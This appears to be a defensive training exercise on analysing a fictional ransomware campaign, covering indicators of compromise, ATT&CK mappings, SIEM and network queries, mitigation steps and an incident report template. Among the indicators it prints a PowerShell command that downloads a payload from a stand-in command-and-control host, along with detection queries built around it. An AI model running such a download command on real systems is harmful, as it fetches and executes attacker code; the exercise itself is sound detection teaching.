Practical Exercise on threat intelligence

Let's dive into another Practical Exercise focused on threat intelligence utilization and detection. This one will simulate an analysis of a campaign by a ransomware threat actor.

Scenario: Ransomware Campaign Detected

A report from a trusted threat intelligence source reveals that a ransomware group known as "BlackSpider" has been conducting attacks on financial organizations. The attackers use phishing emails to deliver a malicious Excel file, which downloads ransomware. The ransomware encrypts files and demands Bitcoin payment.

Threat Report Details

  1. Executive Summary:

    • BlackSpider is targeting financial institutions through phishing campaigns.

    • Malicious Excel files contain macros that download a payload, encrypt files, and exfiltrate sensitive data.

    • The ransomware communicates with its command-and-control (C2) servers for key exchange.

  2. Indicators of Compromise (IOCs):

    • Malicious Domains:

      • malicious-excel-c2.net

      • ransom-payload-c2.io

    • File Hashes:

      • MD5: 8e35f4b5b1f4e723fe7c8bb67f29ec3a

      • SHA256: ab43a1b3e4d8cd94f71280e6ef6a248bcd0b25e923e77fc60b54d52b12045a38

    • PowerShell Commands:

      • Invoke-WebRequest -Uri http://malicious-excel-c2.net/payload.exe

    • Malware Executable Name: ransomware_payload.exe

    • Bitcoin Wallet Address: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa

  3. TTPs (Mapped to MITRE ATT&CK):

    • Initial Access: Phishing email with malicious Excel attachment (T1566.001).

    • Execution: Macro executes PowerShell to download the payload (T1059.001).

    • Persistence: Scheduled tasks to execute the ransomware at system startup (T1053.005).

    • Impact: Encrypting files and displaying a ransom note (T1486).

  4. Detection Recommendations:

    • Monitor network traffic for connections to malicious-excel-c2.net.

    • Detect PowerShell commands that include suspicious Invoke-WebRequest activity.

    • Search endpoints for the malware hash and executable name.

Exercise: Simulated Detection and Analysis

Step 1: Extract Key IOCs

  1. Domains:

    • malicious-excel-c2.net

    • ransom-payload-c2.io

  2. File Hashes:

    • 8e35f4b5b1f4e723fe7c8bb67f29ec3a

    • ab43a1b3e4d8cd94f71280e6ef6a248bcd0b25e923e77fc60b54d52b12045a38

  3. Commands:

    • Invoke-WebRequest -Uri http://malicious-excel-c2.net/payload.exe

  4. Persistence Mechanism:

    • Check scheduled tasks created by ransomware_payload.exe.

Step 2: Analyze Logs Using SIEM Queries

  1. Search for Malicious Domains:

    index=network_traffic
| search dest_domain="malicious-excel-c2.net" OR dest_domain="ransom-payload-c2.io"

  2. Look for File Hashes in Endpoint Logs:

    index=endpoint_logs
| search file_hash="8e35f4b5b1f4e723fe7c8bb67f29ec3a" OR file_hash="ab43a1b3e4d8cd94f71280e6ef6a248bcd0b25e923e77fc60b54d52b12045a38"

  3. Detect PowerShell Commands:

    index=endpoint_logs
| search process_name="powershell.exe" AND command_line="Invoke-WebRequest -Uri http://malicious-excel-c2.net/payload.exe"

  4. Investigate Scheduled Tasks:

    index=endpoint_logs
| search event_id=4698 AND task_name="ransomware_payload.exe"

Step 3: Network Analysis

Using tools like Wireshark or Zeek, inspect for:

  1. Outbound Connections:

    • Check for HTTP/HTTPS connections to malicious-excel-c2.net.

    • Example Wireshark filter:

      arduinoCopy codehttp.host == "malicious-excel-c2.net"

  2. Data Exfiltration:

    • Look for abnormal file uploads to ransom-payload-c2.io.

    • Example Zeek script:

      bashCopy codecat http.log | grep "POST /upload" | grep "ransom-payload-c2.io"

Step 4: Endpoint Analysis

Using an endpoint detection tool (e.g., CrowdStrike, Microsoft Defender):

  1. Search for ransomware_payload.exe in process and file activity logs.

  2. Investigate registry modifications for persistence:

    • Example registry path: HKCU\Software\Microsoft\Windows\CurrentVersion\Run.

    • Use Windows Event ID 4657 to track registry changes.

Step 5: Mitigation Steps

  1. Containment:

    • Block malicious-excel-c2.net and ransom-payload-c2.io on your firewall and proxy.

    • Quarantine endpoints where ransomware_payload.exe is detected.

  2. Prevention:

    • Disable macros in Excel by default across the organization.

    • Implement PowerShell script restrictions using Group Policy.

  3. Remediation:

    • Remove persistence mechanisms (e.g., scheduled tasks, registry keys).

    • Restore files from backups if ransomware encryption is detected.

Step 6: Create an Incident Report

  • Summary of Attack:

    • Describe the ransomware campaign and how it was delivered.

  • Findings:

    • List infected systems, identified IOCs, and suspicious activities.

  • Actions Taken:

    • Explain containment, eradication, and remediation steps.

  • Recommendations:

    • Suggest measures to strengthen defenses (e.g., phishing awareness, endpoint monitoring).

---

Let’s start with writing a simulated SIEM query, crafting a mitigation plan, and creating a detailed incident report for the scenario.

1. SIEM Query Examples

a. Network Traffic Analysis

Objective: Detect any communication with malicious domains.

Query:

index=network_traffic
| search dest_domain="malicious-excel-c2.net" OR dest_domain="ransom-payload-c2.io"
| stats count by src_ip, dest_ip, dest_domain, timestamp

Explanation: This query searches for traffic to the malicious domains and provides the source IPs, destination IPs, domains, and timestamps for each occurrence.

b. Endpoint File Hash Detection

Objective: Identify endpoints where malicious files have been detected.

Query:

index=endpoint_logs
| search file_hash="8e35f4b5b1f4e723fe7c8bb67f29ec3a" OR file_hash="ab43a1b3e4d8cd94f71280e6ef6a248bcd0b25e923e77fc60b54d52b12045a38"
| stats count by host_name, file_path, file_hash, timestamp

Explanation: This checks endpoint logs for the ransomware file hashes and lists the hosts, file paths, and timestamps where they were detected.

c. PowerShell Command Detection

Objective: Find suspicious PowerShell commands used to download ransomware.

Query:

index=endpoint_logs
| search process_name="powershell.exe" AND command_line="*Invoke-WebRequest*malicious-excel-c2.net*"
| stats count by host_name, user, command_line, timestamp

Explanation: This detects PowerShell commands containing the Invoke-WebRequest function and logs the details of the affected hosts and users.

d. Scheduled Task Persistence Detection

Objective: Identify the creation of malicious scheduled tasks.

Query:

index=endpoint_logs
| search event_id=4698 AND task_name="ransomware_payload.exe"
| stats count by host_name, task_name, timestamp

Explanation: Monitors for Event ID 4698, which logs the creation of new scheduled tasks, focusing on the ransomware’s persistence mechanism.

2. Mitigation Plan

a. Containment

  1. Block Malicious Domains:

    • Add malicious-excel-c2.net and ransom-payload-c2.io to the firewall or proxy blocklist.

  2. Isolate Infected Hosts:

    • Disconnect any endpoints showing evidence of the ransomware.

  3. Disable Macros Organization-Wide:

    • Use Group Policy to disable macros in Microsoft Office documents.

b. Remediation

  1. Remove Malicious Files:

    • Use EDR tools to delete ransomware_payload.exe from all infected endpoints.

  2. Eliminate Persistence Mechanisms:

    • Delete any malicious scheduled tasks or registry entries.

    • Remove registry key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ransomware_payload.exe.

  3. Restore Encrypted Files:

    • Recover data from known good backups.

c. Prevention

  1. Email Security:

    • Enable attachment scanning for phishing emails.

    • Train users to recognize phishing attempts.

  2. Endpoint Security:

    • Deploy advanced EDR solutions for proactive monitoring.

  3. Restrict PowerShell Usage:

    • Enforce PowerShell Constrained Language Mode.

    • Monitor for unauthorized script executions.

3. Incident Report

Subject: Incident Report - BlackSpider Ransomware Campaign

Incident Summary:

On [date], a ransomware campaign by the threat actor group BlackSpider was identified targeting our organization. The ransomware was distributed via phishing emails containing malicious Excel attachments. The payload encrypted files and exfiltrated data to command-and-control servers.

Findings:

  1. Affected Systems:

    • Host: Finance-PC-01

    • Host: Admin-Laptop

  2. Indicators of Compromise:

    • Malicious domains: malicious-excel-c2.net, ransom-payload-c2.io

    • File hashes: 8e35f4b5b1f4e723fe7c8bb67f29ec3a, ab43a1b3e4d8cd94f71280e6ef6a248bcd0b25e923e77fc60b54d52b12045a38

    • PowerShell commands: Invoke-WebRequest -Uri http://malicious-excel-c2.net/payload.exe

    • Scheduled task: ransomware_payload.exe

Actions Taken:

  1. Containment:

    • Blocked malicious domains on firewalls and proxies.

    • Isolated affected endpoints.

  2. Remediation:

    • Removed malicious files from infected hosts.

    • Deleted registry entries and scheduled tasks used for persistence.

    • Restored encrypted files from backups.

  3. Preventive Measures:

    • Disabled macros across the organization.

    • Enabled PowerShell script logging.

    • Conducted phishing awareness training for employees.

Recommendations:

  1. Enhance email security by implementing sandboxing for attachments.

  2. Monitor for PowerShell activity using logging and SIEM queries.

  3. Regularly update antivirus and endpoint security solutions.

  4. Review and update incident response playbooks for ransomware attacks.

PreviousThreat IntelligenceNextpart 1

Last updated